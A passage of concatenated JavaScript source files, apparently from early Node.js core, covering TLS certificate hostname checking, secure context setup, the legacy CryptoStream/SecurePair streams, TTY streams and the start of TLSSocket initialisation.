    if (/^[0-9A-Z\-]+$/.test(name)) name = name.toLowerCase();
    ctx[name] = true;
  });
  return Object.getOwnPropertyNames(ctx).sort();
};



exports.convertNPNProtocols = function convertNPNProtocols(NPNProtocols, out) {
  
  if (util.isArray(NPNProtocols)) {
    var buff = new Buffer(NPNProtocols.reduce(function(p, c) {
      return p + 1 + Buffer.byteLength(c);
    }, 0));

    NPNProtocols.reduce(function(offset, c) {
      var clen = Buffer.byteLength(c);
      buff[offset] = clen;
      buff.write(c, offset + 1);

      return offset + 1 + clen;
    }, 0);

    NPNProtocols = buff;
  }

  
  if (util.isBuffer(NPNProtocols)) {
    out.NPNProtocols = NPNProtocols;
  }
};

exports.checkServerIdentity = function checkServerIdentity(host, cert) {
  
  function regexpify(host, wildcards) {
    
    if (!/\.$/.test(host)) host += '.';

    
    
    
    
    
    
    
    
    
    
    if (!wildcards && /\*/.test(host) || /[\.\*].*\*/.test(host) ||
        /\*/.test(host) && !/\*.*\..+\..+/.test(host)) {
      return /$./;
    }

    
    
    
    var re = host.replace(
        /\*([a-z0-9\\-_\.])|[\.,\-\\\^\$+?*\[\]\(\):!\|{}]/g,
        function(all, sub) {
          if (sub) return '[a-z0-9\\-_]*' + (sub === '-' ? '\\-' : sub);
          return '\\' + all;
        });

    return new RegExp('^' + re + '$', 'i');
  }

  var dnsNames = [],
      uriNames = [],
      ips = [],
      matchCN = true,
      valid = false,
      reason = 'Unknown reason';

  
  
  
  
  
  if (cert.subjectaltname) {
    cert.subjectaltname.split(/, /g).forEach(function(altname) {
      var option = altname.match(/^(DNS|IP Address|URI):(.*)$/);
      if (!option)
        return;
      if (option[1] === 'DNS') {
        dnsNames.push(option[2]);
      } else if (option[1] === 'IP Address') {
        ips.push(option[2]);
      } else if (option[1] === 'URI') {
        var uri = url.parse(option[2]);
        if (uri) uriNames.push(uri.hostname);
      }
    });
  }

  
  
  if (net.isIP(host)) {
    valid = ips.some(function(ip) {
      return ip === host;
    });
    if (!valid) {
      reason = util.format('IP: %s is not in the cert\'s list: %s',
                           host,
                           ips.join(', '));
    }
  } else {
    
    if (!/\.$/.test(host)) host += '.';

    
    
    dnsNames = dnsNames.map(function(name) {
      return regexpify(name, true);
    });

    
    uriNames = uriNames.map(function(name) {
      return regexpify(name, false);
    });

    dnsNames = dnsNames.concat(uriNames);

    if (dnsNames.length > 0) matchCN = false;

    
    
    
    
    
    
    
    
    if (matchCN) {
      var commonNames = cert.subject.CN;
      if (util.isArray(commonNames)) {
        for (var i = 0, k = commonNames.length; i < k; ++i) {
          dnsNames.push(regexpify(commonNames[i], true));
        }
      } else {
        dnsNames.push(regexpify(commonNames, true));
      }
    }

    valid = dnsNames.some(function(re) {
      return re.test(host);
    });

    if (!valid) {
      if (cert.subjectaltname) {
        reason = util.format('Host: %s is not in the cert\'s altnames: %s',
                             host,
                             cert.subjectaltname);
      } else {
        reason = util.format('Host: %s is not cert\'s CN: %s',
                             host,
                             cert.subject.CN);
      }
    }
  }

  if (!valid) {
    var err = new Error(
        util.format('Hostname/IP doesn\'t match certificate\'s altnames: %j',
                    reason));
    err.reason = reason;
    err.host = host;
    err.cert = cert;
    return err;
  }
};



exports.parseCertString = function parseCertString(s) {
  var out = {};
  var parts = s.split('\n');
  for (var i = 0, len = parts.length; i < len; i++) {
    var sepIndex = parts[i].indexOf('=');
    if (sepIndex > 0) {
      var key = parts[i].slice(0, sepIndex);
      var value = parts[i].slice(sepIndex + 1);
      if (key in out) {
        if (!util.isArray(out[key])) {
          out[key] = [out[key]];
        }
        out[key].push(value);
      } else {
        out[key] = value;
      }
    }
  }
  return out;
};


exports.createSecureContext = require('_tls_common').createSecureContext;
exports.SecureContext = require('_tls_common').SecureContext;
exports.TLSSocket = require('_tls_wrap').TLSSocket;
exports.Server = require('_tls_wrap').Server;
exports.createServer = require('_tls_wrap').createServer;
exports.connect = require('_tls_wrap').connect;


exports.__defineGetter__('createSecurePair', util.deprecate(function() {
  return require('_tls_legacy').createSecurePair;
}, 'createSecurePair() is deprecated, use TLSSocket instead'));
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              

========






















var util = require('util');
var constants = require('constants');
var tls = require('tls');


var crypto = null;

var binding = process.binding('crypto');
var NativeSecureContext = binding.SecureContext;

function SecureContext(secureProtocol, flags, context) {
  if (!(this instanceof SecureContext)) {
    return new SecureContext(secureProtocol, flags, context);
  }

  if (context) {
    this.context = context;
  } else {
    this.context = new NativeSecureContext();

    if (secureProtocol) {
      this.context.init(secureProtocol);
    } else {
      this.context.init();
    }
  }

  if (flags) this.context.setOptions(flags);
}

exports.SecureContext = SecureContext;


exports.createSecureContext = function createSecureContext(options, context) {
  if (!options) options = {};

  var secureOptions = options.secureOptions;
  if (options.honorCipherOrder)
    secureOptions |= constants.SSL_OP_CIPHER_SERVER_PREFERENCE;

  var c = new SecureContext(options.secureProtocol, secureOptions, context);

  if (context) return c;

  if (options.key) {
    if (Array.isArray(options.key)) {
      for (var i = 0; i < options.key.length; i++) {
        var key = options.key[i];

        if (key.passphrase)
          c.context.setKey(key.pem, key.passphrase);
        else
          c.context.setKey(key);
      }
    } else {
      if (options.passphrase) {
        c.context.setKey(options.key, options.passphrase);
      } else {
        c.context.setKey(options.key);
      }
    }
  }

  
  
  if (options.ca) {
    if (util.isArray(options.ca)) {
      for (var i = 0, len = options.ca.length; i < len; i++) {
        c.context.addCACert(options.ca[i]);
      }
    } else {
      c.context.addCACert(options.ca);
    }
  } else {
    c.context.addRootCerts();
  }

  if (options.cert) {
    if (Array.isArray(options.cert)) {
      for (var i = 0; i < options.cert.length; i++)
        c.context.setCert(options.cert[i]);
    } else {
      c.context.setCert(options.cert);
    }
  }

  if (options.ciphers)
    c.context.setCiphers(options.ciphers);
  else
    c.context.setCiphers(tls.DEFAULT_CIPHERS);

  if (util.isUndefined(options.ecdhCurve))
    c.context.setECDHCurve(tls.DEFAULT_ECDH_CURVE);
  else if (options.ecdhCurve)
    c.context.setECDHCurve(options.ecdhCurve);

  if (options.dhparam) c.context.setDHParam(options.dhparam);

  if (options.crl) {
    if (util.isArray(options.crl)) {
      for (var i = 0, len = options.crl.length; i < len; i++) {
        c.context.addCRL(options.crl[i]);
      }
    } else {
      c.context.addCRL(options.crl);
    }
  }

  if (options.sessionIdContext) {
    c.context.setSessionIdContext(options.sessionIdContext);
  }

  if (options.pfx) {
    var pfx = options.pfx;
    var passphrase = options.passphrase;

    if (!crypto)
      crypto = require('crypto');

    pfx = crypto._toBuf(pfx);
    if (passphrase)
      passphrase = crypto._toBuf(passphrase);

    if (passphrase) {
      c.context.loadPKCS12(pfx, passphrase);
    } else {
      c.context.loadPKCS12(pfx);
    }
  }

  return c;
};

exports.translatePeerCertificate = function translatePeerCertificate(c) {
  if (!c)
    return null;

  if (c.issuer) c.issuer = tls.parseCertString(c.issuer);
  if (c.issuerCertificate && c.issuerCertificate !== c) {
    c.issuerCertificate = translatePeerCertificate(c.issuerCertificate);
  }
  if (c.subject) c.subject = tls.parseCertString(c.subject);
  if (c.infoAccess) {
    var info = c.infoAccess;
    c.infoAccess = {};

    
    info.replace(/([^\n:]*):([^\n]*)(?:\n|$)/g, function(all, key, val) {
      if (key === '__proto__')
        return;

      if (c.infoAccess.hasOwnProperty(key))
        c.infoAccess[key].push(val);
      else
        c.infoAccess[key] = [val];
    });
  }
  return c;
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      

========






















var inherits = require('util').inherits;
var net = require('net');
var TTY = process.binding('tty_wrap').TTY;
var isTTY = process.binding('tty_wrap').isTTY;
var util = require('util');

var errnoException = util._errnoException;


exports.isatty = function(fd) {
  return isTTY(fd);
};



exports.setRawMode = util.deprecate(function(flag) {
  if (!process.stdin.isTTY) {
    throw new Error('can\'t set raw mode on non-tty');
  }
  process.stdin.setRawMode(flag);
}, 'tty.setRawMode: Use `process.stdin.setRawMode()` instead.');


function ReadStream(fd, options) {
  if (!(this instanceof ReadStream))
    return new ReadStream(fd, options);

  options = util._extend({
    highWaterMark: 0,
    readable: true,
    writable: false,
    handle: new TTY(fd, true)
  }, options);

  net.Socket.call(this, options);

  this.isRaw = false;
  this.isTTY = true;
}
inherits(ReadStream, net.Socket);

exports.ReadStream = ReadStream;

ReadStream.prototype.setRawMode = function(flag) {
  flag = !!flag;
  this._handle.setRawMode(flag);
  this.isRaw = flag;
};



function WriteStream(fd) {
  if (!(this instanceof WriteStream)) return new WriteStream(fd);
  net.Socket.call(this, {
    handle: new TTY(fd, false),
    readable: false,
    writable: true
  });

  var winSize = [];
  var err = this._handle.getWindowSize(winSize);
  if (!err) {
    this.columns = winSize[0];
    this.rows = winSize[1];
  }
}
inherits(WriteStream, net.Socket);
exports.WriteStream = WriteStream;


WriteStream.prototype.isTTY = true;


WriteStream.prototype._refreshSize = function() {
  var oldCols = this.columns;
  var oldRows = this.rows;
  var winSize = [];
  var err = this._handle.getWindowSize(winSize);
  if (err) {
    this.emit('error', errnoException(err, 'getWindowSize'));
    return;
  }
  var newCols = winSize[0];
  var newRows = winSize[1];
  if (oldCols !== newCols || oldRows !== newRows) {
    this.columns = newCols;
    this.rows = newRows;
    this.emit('resize');
  }
};



WriteStream.prototype.cursorTo = function(x, y) {
  require('readline').cursorTo(this, x, y);
};
WriteStream.prototype.moveCursor = function(dx, dy) {
  require('readline').moveCursor(this, dx, dy);
};
WriteStream.prototype.clearLine = function(dir) {
  require('readline').clearLine(this, dir);
};
WriteStream.prototype.clearScreenDown = function() {
  require('readline').clearScreenDown(this);
};
WriteStream.prototype.getWindowSize = function() {
  return [this.columns, this.rows];
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               

========






















var assert = require('assert');
var events = require('events');
var stream = require('stream');
var tls = require('tls');
var util = require('util');
var common = require('_tls_common');

var Timer = process.binding('timer_wrap').Timer;
var Connection = null;
try {
  Connection = process.binding('crypto').Connection;
} catch (e) {
  throw new Error('node.js not compiled with openssl crypto support.');
}

function SlabBuffer() {
  this.create();
}


SlabBuffer.prototype.create = function create() {
  this.isFull = false;
  this.pool = new Buffer(tls.SLAB_BUFFER_SIZE);
  this.offset = 0;
  this.remaining = this.pool.length;
};


SlabBuffer.prototype.use = function use(context, fn, size) {
  if (this.remaining === 0) {
    this.isFull = true;
    return 0;
  }

  var actualSize = this.remaining;

  if (!util.isNull(size)) actualSize = Math.min(size, actualSize);

  var bytes = fn.call(context, this.pool, this.offset, actualSize);
  if (bytes > 0) {
    this.offset += bytes;
    this.remaining -= bytes;
  }

  assert(this.remaining >= 0);

  return bytes;
};


var slabBuffer = null;



function CryptoStream(pair, options) {
  stream.Duplex.call(this, options);

  this.pair = pair;
  this._pending = null;
  this._pendingEncoding = '';
  this._pendingCallback = null;
  this._doneFlag = false;
  this._retryAfterPartial = false;
  this._halfRead = false;
  this._sslOutCb = null;
  this._resumingSession = false;
  this._reading = true;
  this._destroyed = false;
  this._ended = false;
  this._finished = false;
  this._opposite = null;

  if (util.isNull(slabBuffer)) slabBuffer = new SlabBuffer();
  this._buffer = slabBuffer;

  this.once('finish', onCryptoStreamFinish);

  
  this.once('end', onCryptoStreamEnd);
}
util.inherits(CryptoStream, stream.Duplex);


function onCryptoStreamFinish() {
  this._finished = true;

  if (this === this.pair.cleartext) {
    if (this.pair.ssl) {
      
      
      
      if (this.pair.ssl.shutdown() !== 1) {
        if (this.pair.ssl && this.pair.ssl.error)
          return this.pair.error();

        this.pair.ssl.shutdown();
      }

      if (this.pair.ssl && this.pair.ssl.error)
        return this.pair.error();
    }
  } else {
  }

  
  if (this._opposite.readable) this._opposite.read(0);

  if (this._opposite._ended) {
    this._done();

    
    if (this === this.pair.cleartext) this._opposite._done();
  }
}


function onCryptoStreamEnd() {
  this._ended = true;
}



CryptoStream.prototype.init = function init() {
  var self = this;
  this._opposite.on('sslOutEnd', function() {
    if (self._sslOutCb) {
      var cb = self._sslOutCb;
      self._sslOutCb = null;
      cb(null);
    }
  });
};


CryptoStream.prototype._write = function write(data, encoding, cb) {
  assert(util.isNull(this._pending));

  
  if (!this.pair.ssl) return cb(null);

  
  
  
  
  
  if (!this._resumingSession &&
      this._opposite._internallyPendingBytes() < 128 * 1024) {
    
    var written;
    if (this === this.pair.cleartext) {
      written = this.pair.ssl.clearIn(data, 0, data.length);
    } else {
      written = this.pair.ssl.encIn(data, 0, data.length);
    }

    
    if (this.pair.ssl && this.pair.ssl.error) {
      return cb(this.pair.error(true));
    }

    
    this.pair.cleartext.read(0);

    
    if (this.pair.encrypted._internallyPendingBytes())
      this.pair.encrypted.read(0);

    
    this.pair.maybeInitFinished();

    
    if (written === data.length) {


      
      if (this._opposite._halfRead) {
        assert(util.isNull(this._sslOutCb));
        this._sslOutCb = cb;
      } else {
        cb(null);
      }
      return;
    } else if (written !== 0 && written !== -1) {
      assert(!this._retryAfterPartial);
      this._retryAfterPartial = true;
      this._write(data.slice(written), encoding, cb);
      this._retryAfterPartial = false;
      return;
    }
  } else {

    
    this.pair.cleartext.read(0);
  }

  
  this._pending = data;
  this._pendingEncoding = encoding;
  this._pendingCallback = cb;

};


CryptoStream.prototype._writePending = function writePending() {
  var data = this._pending,
      encoding = this._pendingEncoding,
      cb = this._pendingCallback;

  this._pending = null;
  this._pendingEncoding = '';
  this._pendingCallback = null;
  this._write(data, encoding, cb);
};


CryptoStream.prototype._read = function read(size) {
  
  if (!this.pair.ssl) return this.push(null);

  
  
  if (this._resumingSession || !this._reading) return this.push('');

  var out;
  if (this === this.pair.cleartext) {
    out = this.pair.ssl.clearOut;
  } else {
    out = this.pair.ssl.encOut;
  }

  var bytesRead = 0,
      start = this._buffer.offset,
      last = start;
  do {
    assert(last === this._buffer.offset);
    var read = this._buffer.use(this.pair.ssl, out, size - bytesRead);
    if (read > 0) {
      bytesRead += read;
    }
    last = this._buffer.offset;

    
    if (this.pair.ssl && this.pair.ssl.error) {
      this.pair.error();
      break;
    }
  } while (read > 0 &&
           !this._buffer.isFull &&
           bytesRead < size &&
           this.pair.ssl !== null);

  
  this.pair.maybeInitFinished();

  
  var pool = this._buffer.pool;
  if (this._buffer.isFull) this._buffer.create();

  assert(bytesRead >= 0);


  
  if (!util.isNull(this._pending)) this._writePending();
  if (!util.isNull(this._opposite._pending)) this._opposite._writePending();

  if (bytesRead === 0) {
    
    if (this._opposite._finished && this._internallyPendingBytes() === 0 ||
        this.pair.ssl && this.pair.ssl.receivedShutdown) {
      
      this._done();

      
      if (this === this.pair.cleartext) {
        this._opposite._done();

        
        this.push(null);
      } else if (!this.pair.ssl || !this.pair.ssl.receivedShutdown) {
        
        this.push(null);
      }
    } else {
      
      this.push('');
    }
  } else {
    
    this.push(pool.slice(start, start + bytesRead));
  }

  
  var halfRead = this._internallyPendingBytes() !== 0;

  
  if (this._halfRead !== halfRead) {
    this._halfRead = halfRead;

    
    if (!halfRead) {

      this.emit('sslOutEnd');
    }
  }
};


CryptoStream.prototype.setTimeout = function(timeout, callback) {
  if (this.socket) this.socket.setTimeout(timeout, callback);
};


CryptoStream.prototype.setNoDelay = function(noDelay) {
  if (this.socket) this.socket.setNoDelay(noDelay);
};


CryptoStream.prototype.setKeepAlive = function(enable, initialDelay) {
  if (this.socket) this.socket.setKeepAlive(enable, initialDelay);
};

CryptoStream.prototype.__defineGetter__('bytesWritten', function() {
  return this.socket ? this.socket.bytesWritten : 0;
});

CryptoStream.prototype.getPeerCertificate = function(detailed) {
  if (this.pair.ssl) {
    return common.translatePeerCertificate(
        this.pair.ssl.getPeerCertificate(detailed));
  }

  return null;
};

CryptoStream.prototype.getSession = function() {
  if (this.pair.ssl) {
    return this.pair.ssl.getSession();
  }

  return null;
};

CryptoStream.prototype.isSessionReused = function() {
  if (this.pair.ssl) {
    return this.pair.ssl.isSessionReused();
  }

  return null;
};

CryptoStream.prototype.getCipher = function(err) {
  if (this.pair.ssl) {
    return this.pair.ssl.getCurrentCipher();
  } else {
    return null;
  }
};


CryptoStream.prototype.end = function(chunk, encoding) {

  
  if (!util.isNull(this._pending)) this._writePending();

  this.writable = false;

  stream.Duplex.prototype.end.call(this, chunk, encoding);
};


CryptoStream.prototype.destroySoon = function(err) {

  if (this.writable)
    this.end();

  if (this._writableState.finished && this._opposite._ended) {
    this.destroy();
  } else {
    
    
    var self = this;
    var waiting = 1;
    function finish() {
      if (--waiting === 0) self.destroy();
    }
    this._opposite.once('end', finish);
    if (!this._finished) {
      this.once('finish', finish);
      ++waiting;
    }
  }
};


CryptoStream.prototype.destroy = function(err) {
  if (this._destroyed) return;
  this._destroyed = true;
  this.readable = this.writable = false;

  
  this._opposite.destroy();

  var self = this;
  process.nextTick(function() {
    
    self.push(null);

    
    self.emit('close', err ? true : false);
  });
};


CryptoStream.prototype._done = function() {
  this._doneFlag = true;

  if (this === this.pair.encrypted && !this.pair._secureEstablished)
    return this.pair.error();

  if (this.pair.cleartext._doneFlag &&
      this.pair.encrypted._doneFlag &&
      !this.pair._doneFlag) {
    
    this.pair.destroy();
  }
};



Object.defineProperty(CryptoStream.prototype, 'readyState', {
  get: function() {
    if (this._connecting) {
      return 'opening';
    } else if (this.readable && this.writable) {
      return 'open';
    } else if (this.readable && !this.writable) {
      return 'readOnly';
    } else if (!this.readable && this.writable) {
      return 'writeOnly';
    } else {
      return 'closed';
    }
  }
});


function CleartextStream(pair, options) {
  CryptoStream.call(this, pair, options);

  
  
  var self = this;
  this._handle = {
    readStop: function() {
      self._reading = false;
    },
    readStart: function() {
      if (self._reading && self._readableState.length > 0) return;
      self._reading = true;
      self.read(0);
      if (self._opposite.readable) self._opposite.read(0);
    }
  };
}
util.inherits(CleartextStream, CryptoStream);


CleartextStream.prototype._internallyPendingBytes = function() {
  if (this.pair.ssl) {
    return this.pair.ssl.clearPending();
  } else {
    return 0;
  }
};


CleartextStream.prototype.address = function() {
  return this.socket && this.socket.address();
};


CleartextStream.prototype.__defineGetter__('remoteAddress', function() {
  return this.socket && this.socket.remoteAddress;
});

CleartextStream.prototype.__defineGetter__('remoteFamily', function() {
  return this.socket && this.socket.remoteFamily;
});

CleartextStream.prototype.__defineGetter__('remotePort', function() {
  return this.socket && this.socket.remotePort;
});


CleartextStream.prototype.__defineGetter__('localAddress', function() {
  return this.socket && this.socket.localAddress;
});


CleartextStream.prototype.__defineGetter__('localPort', function() {
  return this.socket && this.socket.localPort;
});


function EncryptedStream(pair, options) {
  CryptoStream.call(this, pair, options);
}
util.inherits(EncryptedStream, CryptoStream);


EncryptedStream.prototype._internallyPendingBytes = function() {
  if (this.pair.ssl) {
    return this.pair.ssl.encPending();
  } else {
    return 0;
  }
};


function onhandshakestart() {
  
  var self = this;
  var ssl = self.ssl;
  var now = Timer.now();

  assert(now >= ssl.lastHandshakeTime);

  if ((now - ssl.lastHandshakeTime) >= tls.CLIENT_RENEG_WINDOW * 1000) {
    ssl.handshakes = 0;
  }

  var first = (ssl.lastHandshakeTime === 0);
  ssl.lastHandshakeTime = now;
  if (first) return;

  if (++ssl.handshakes > tls.CLIENT_RENEG_LIMIT) {
    
    
    
    setImmediate(function() {
      var err = new Error('TLS session renegotiation attack detected.');
      if (self.cleartext) self.cleartext.emit('error', err);
    });
  }
}


function onhandshakedone() {
  
  
}


function onclienthello(hello) {
  var self = this,
      once = false;

  this._resumingSession = true;
  function callback(err, session) {
    if (once) return;
    once = true;

    if (err) return self.socket.destroy(err);

    self.ssl.loadSession(session);
    self.ssl.endParser();

    
    self._resumingSession = false;
    self.cleartext.read(0);
    self.encrypted.read(0);
  }

  if (hello.sessionId.length <= 0 ||
      !this.server ||
      !this.server.emit('resumeSession', hello.sessionId, callback)) {
    callback(null, null);
  }
}


function onnewsession(key, session) {
  if (!this.server) return;

  var self = this;
  var once = false;

  self.server.emit('newSession', key, session, function() {
    if (once)
      return;
    once = true;

    if (self.ssl)
      self.ssl.newSessionDone();
  });
}


function onocspresponse(resp) {
  this.emit('OCSPResponse', resp);
}




function SecurePair(context, isServer, requestCert, rejectUnauthorized,
                    options) {
  if (!(this instanceof SecurePair)) {
    return new SecurePair(context,
                          isServer,
                          requestCert,
                          rejectUnauthorized,
                          options);
  }

  var self = this;

  options || (options = {});

  events.EventEmitter.call(this);

  this.server = options.server;
  this._secureEstablished = false;
  this._isServer = isServer ? true : false;
  this._encWriteState = true;
  this._clearWriteState = true;
  this._doneFlag = false;
  this._destroying = false;

  if (!context) {
    this.credentials = tls.createSecureContext();
  } else {
    this.credentials = context;
  }

  if (!this._isServer) {
    
    
    requestCert = true;
  }

  this._rejectUnauthorized = rejectUnauthorized ? true : false;
  this._requestCert = requestCert ? true : false;

  this.ssl = new Connection(this.credentials.context,
                            this._isServer ? true : false,
                            this._isServer ? this._requestCert :
                                             options.servername,
                            this._rejectUnauthorized);

  if (this._isServer) {
    this.ssl.onhandshakestart = onhandshakestart.bind(this);
    this.ssl.onhandshakedone = onhandshakedone.bind(this);
    this.ssl.onclienthello = onclienthello.bind(this);
    this.ssl.onnewsession = onnewsession.bind(this);
    this.ssl.lastHandshakeTime = 0;
    this.ssl.handshakes = 0;
  } else {
    this.ssl.onocspresponse = onocspresponse.bind(this);
  }

  if (process.features.tls_sni) {
    if (this._isServer && options.SNICallback) {
      this.ssl.setSNICallback(options.SNICallback);
    }
    this.servername = null;
  }

  if (process.features.tls_npn && options.NPNProtocols) {
    this.ssl.setNPNProtocols(options.NPNProtocols);
    this.npnProtocol = null;
  }

  
  this.cleartext = new CleartextStream(this, options.cleartext);

  
  this.encrypted = new EncryptedStream(this, options.encrypted);

  
  this.cleartext._opposite = this.encrypted;
  this.encrypted._opposite = this.cleartext;
  this.cleartext.init();
  this.encrypted.init();

  process.nextTick(function() {
    
    if (self.ssl) {
      self.ssl.start();

      if (options.requestOCSP)
        self.ssl.requestOCSP();

      
      if (self.ssl && self.ssl.error)
        self.error();
    }
  });
}

util.inherits(SecurePair, events.EventEmitter);


exports.createSecurePair = function(context,
                                    isServer,
                                    requestCert,
                                    rejectUnauthorized) {
  var pair = new SecurePair(context,
                            isServer,
                            requestCert,
                            rejectUnauthorized);
  return pair;
};


SecurePair.prototype.maybeInitFinished = function() {
  if (this.ssl && !this._secureEstablished && this.ssl.isInitFinished()) {
    if (process.features.tls_npn) {
      this.npnProtocol = this.ssl.getNegotiatedProtocol();
    }

    if (process.features.tls_sni) {
      this.servername = this.ssl.getServername();
    }

    this._secureEstablished = true;
    this.emit('secure');
  }
};


SecurePair.prototype.destroy = function() {
  if (this._destroying) return;

  if (!this._doneFlag) {
    this._destroying = true;

    
    this.cleartext.destroy();
    this.encrypted.destroy();

    this._doneFlag = true;
    this.ssl.error = null;
    this.ssl.close();
    this.ssl = null;
  }
};


SecurePair.prototype.error = function(returnOnly) {
  var err = this.ssl.error;
  this.ssl.error = null;

  if (!this._secureEstablished) {
    
    if (!err || err.message === 'ZERO_RETURN') {
      var connReset = new Error('socket hang up');
      connReset.code = 'ECONNRESET';
      connReset.sslError = err && err.message;

      err = connReset;
    }
    this.destroy();
    if (!returnOnly) this.emit('error', err);
  } else if (this._isServer &&
             this._rejectUnauthorized &&
             /peer did not return a certificate/.test(err.message)) {
    
    this.destroy();
  } else {
    if (!returnOnly) this.cleartext.emit('error', err);
  }
  return err;
};


exports.pipe = function pipe(pair, socket) {
  pair.encrypted.pipe(socket);
  socket.pipe(pair.encrypted);

  pair.encrypted.on('close', function() {
    process.nextTick(function() {
      
      
      pair.encrypted.unpipe(socket);
      socket.destroySoon();
    });
  });

  pair.fd = socket.fd;
  var cleartext = pair.cleartext;
  cleartext.socket = socket;
  cleartext.encrypted = pair.encrypted;
  cleartext.authorized = false;

  
  
  
  
  
  
  
  socket.on('drain', function() {
    if (pair.encrypted._pending)
      pair.encrypted._writePending();
    if (pair.cleartext._pending)
      pair.cleartext._writePending();
    pair.encrypted.read(0);
    pair.cleartext.read(0);
  });

  function onerror(e) {
    if (cleartext._controlReleased) {
      cleartext.emit('error', e);
    }
  }

  function onclose() {
    socket.removeListener('error', onerror);
    socket.removeListener('timeout', ontimeout);
  }

  function ontimeout() {
    cleartext.emit('timeout');
  }

  socket.on('error', onerror);
  socket.on('close', onclose);
  socket.on('timeout', ontimeout);

  return cleartext;
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   

========

























var assert = require('assert');
var crypto = require('crypto');
var net = require('net');
var tls = require('tls');
var util = require('util');
var listenerCount = require('events').listenerCount;
var common = require('_tls_common');

var Timer = process.binding('timer_wrap').Timer;
var tls_wrap = process.binding('tls_wrap');


var tls_legacy;

function onhandshakestart() {

  var self = this;
  var ssl = self.ssl;
  var now = Timer.now();

  assert(now >= ssl.lastHandshakeTime);

  if ((now - ssl.lastHandshakeTime) >= tls.CLIENT_RENEG_WINDOW * 1000) {
    ssl.handshakes = 0;
  }

  var first = (ssl.lastHandshakeTime === 0);
  ssl.lastHandshakeTime = now;
  if (first) return;

  if (++ssl.handshakes > tls.CLIENT_RENEG_LIMIT) {
    
    
    
    setImmediate(function() {
      var err = new Error('TLS session renegotiation attack detected.');
      self._tlsError(err);
    });
  }
}


function onhandshakedone() {
  
  
  this._finishInit();
}


function loadSession(self, hello, cb) {
  var once = false;
  function onSession(err, session) {
    if (once)
      return cb(new Error('TLS session callback was called 2 times'));
    once = true;

    if (err)
      return cb(err);

    
    
    
    var ret = self.ssl.loadSession(session);

    cb(null, ret);
  }

  if (hello.sessionId.length <= 0 ||
      hello.tlsTicket ||
      self.server &&
      !self.server.emit('resumeSession', hello.sessionId, onSession)) {
    cb(null);
  }
}


function loadSNI(self, servername, cb) {
  if (!servername || !self._SNICallback)
    return cb(null);

  var once = false;
  self._SNICallback(servername, function(err, context) {
    if (once)
      return cb(new Error('TLS SNI callback was called 2 times'));
    once = true;

    if (err)
      return cb(err);

    
    if (context)
      self.ssl.sni_context = context.context || context;

    cb(null, self.ssl.sni_context);
  });
}


function requestOCSP(self, hello, ctx, cb) {
  if (!hello.OCSPRequest || !self.server)
    return cb(null);

  if (!ctx)
    ctx = self.server._sharedCreds;
  if (ctx.context)
    ctx = ctx.context;

  if (listenerCount(self.server, 'OCSPRequest') === 0) {
    return cb(null);
  } else {
    self.server.emit('OCSPRequest',
                     ctx.getCertificate(),
                     ctx.getIssuer(),
                     onOCSP);
  }

  var once = false;
  function onOCSP(err, response) {
    if (once)
      return cb(new Error('TLS OCSP callback was called 2 times'));
    once = true;

    if (err)
      return cb(err);

    if (response)
      self.ssl.setOCSPResponse(response);
    cb(null);
  }
}


function onclienthello(hello) {
  var self = this;

  loadSession(self, hello, function(err, session) {
    if (err)
      return self.destroy(err);

    
    
    
    
    
    
    
    
    
    
    
    
    
    var servername = session && session.servername || hello.servername;
    loadSNI(self, servername, function(err, ctx) {
      if (err)
        return self.destroy(err);
      requestOCSP(self, hello, ctx, function(err) {
        if (err)
          return self.destroy(err);

        self.ssl.endParser();
      });
    });
  });
}


function onnewsession(key, session) {
  if (!this.server)
    return;

  var self = this;
  var once = false;

  this._newSessionPending = true;
  this.server.emit('newSession', key, session, function() {
    if (once)
      return;
    once = true;

    self.ssl.newSessionDone();

    self._newSessionPending = false;
    if (self._securePending)
      self._finishInit();
    self._securePending = false;
  });
}


function onocspresponse(resp) {
  this.emit('OCSPResponse', resp);
}




function TLSSocket(socket, options) {
  
  assert(!(socket instanceof TLSSocket));

  net.Socket.call(this, {
    handle: socket && socket._handle,
    allowHalfOpen: socket && socket.allowHalfOpen,
    readable: false,
    writable: false
  });

  
  if (socket)
    this._connecting = socket._connecting;

  this._tlsOptions = options;
  this._secureEstablished = false;
  this._securePending = false;
  this._newSessionPending = false;
  this._controlReleased = false;
  this._SNICallback = null;
  this.ssl = null;
  this.servername = null;
  this.npnProtocol = null;
  this.authorized = false;
  this.authorizationError = null;

  
  
  this.encrypted = true;

  this.on('error', this._tlsError);

  if (!this._handle) {
    this.once('connect', function() {
      this._init(null);
    });
  } else {
    this._init(socket);
  }

  
  
  this.readable = true;
  this.writable = true;
  this.read(0);
}
util.inherits(TLSSocket, net.Socket);
exports.TLSSocket = TLSSocket;

TLSSocket.prototype._init = function(socket) {
  assert(this._handle);

  
  
  
  
  this._handle.writeQueueSize = 1;

  var self = this;
  var options = this._tlsOptions;

  
  var context = options.secureContext ||
                options.credentials ||
                tls.createSecureContext();
  this.ssl = tls_wrap.wrap(this._handle, context.context, options.isServer);
  this.server = options.server || null;

  
  
  var requestCert = !!options.requestCert || !options.isServer,
      rejectUnauthorized = !!options.rejectUnauthorized;

  this._requestCert = requestCert;
  this._rejectUnauthorized = rejectUnauthorized;
  if (requestCert || rejectUnauthorized)
    this.ssl.setVerifyMode(requestCert, rejectUnauthorized);

  if (options.isServer) {
    this.ssl.onhandshakestart = onhandshakestart.bind(this);
    this.ssl.onhandshakedone = onhandshakedone.bind(this);
